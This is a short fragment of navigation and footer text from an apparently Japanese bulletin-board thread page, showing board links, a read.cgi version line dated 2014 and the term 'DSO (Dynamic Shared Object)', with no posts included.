★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)